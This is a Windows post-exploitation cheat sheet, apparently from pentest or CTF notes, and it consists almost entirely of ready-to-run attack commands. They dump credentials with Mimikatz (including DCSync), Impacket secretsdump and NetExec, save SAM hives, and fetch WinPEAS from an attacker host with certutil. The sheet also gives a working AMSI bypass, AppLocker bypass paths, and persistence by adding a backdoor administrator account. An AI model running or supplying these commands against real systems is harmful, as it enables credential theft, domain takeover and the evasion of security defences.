Windows post-exploitation — dump credentials with Mimikatz and secretsdump, extract hashes, AMSI bypass, WinPEAS enumeration, and persistence via user creation.
```shell
# --- Mimikatz credential dumping ---
# Enable debug privilege first, then dump
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz.exe "privilege::debug" "lsadump::sam" exit
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:senshu.local /all /csv" exit

# --- Impacket secretsdump (from attacker) ---
impacket-secretsdump senshu.local/sec_user:'P@ssw0rd'@10.10.10.27
impacket-secretsdump -just-dc senshu.local/sec_user:'P@ssw0rd'@10.10.10.27

# --- NetExec credential extraction ---
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --sam
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --lsa
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --dpapi
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --wifi
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' --ntds
nxc smb 10.10.10.27 -u sec_user -p 'P@ssw0rd' -M lsassy
nxc ldap 10.10.10.27 -u sec_user -p 'P@ssw0rd' --gmsa

# --- Offline SAM dump ---
# Save registry hives on target
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
# Dump offline with samdump2 (on attacker)
samdump2 SYSTEM SAM

# --- File transfer with certutil ---
certutil -urlcache -f http://10.10.10.21:8000/winpeas.exe C:\Temp\winpeas.exe

# --- Enumeration tools ---
# WinPEAS
.\winpeas.exe
# Seatbelt
.\Seatbelt.exe -group=all

# --- AMSI bypass (run before loading tools in PowerShell) ---
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# --- AppLocker bypass paths (writable by default) ---
# C:\Windows\Tasks\
# C:\Windows\Temp\
# C:\Windows\Tracing\

# --- Persistence: add admin user and grant access ---
net user hacker P@ssw0rd /add
net localgroup Administrators hacker /add
net localgroup "remote desktop users" hacker /add
net localgroup "Remote Management Users" hacker /add
```
https://github.com/gentilkiwi/mimikatz
https://github.com/fortra/impacket
https://github.com/peass-ng/PEASS-ng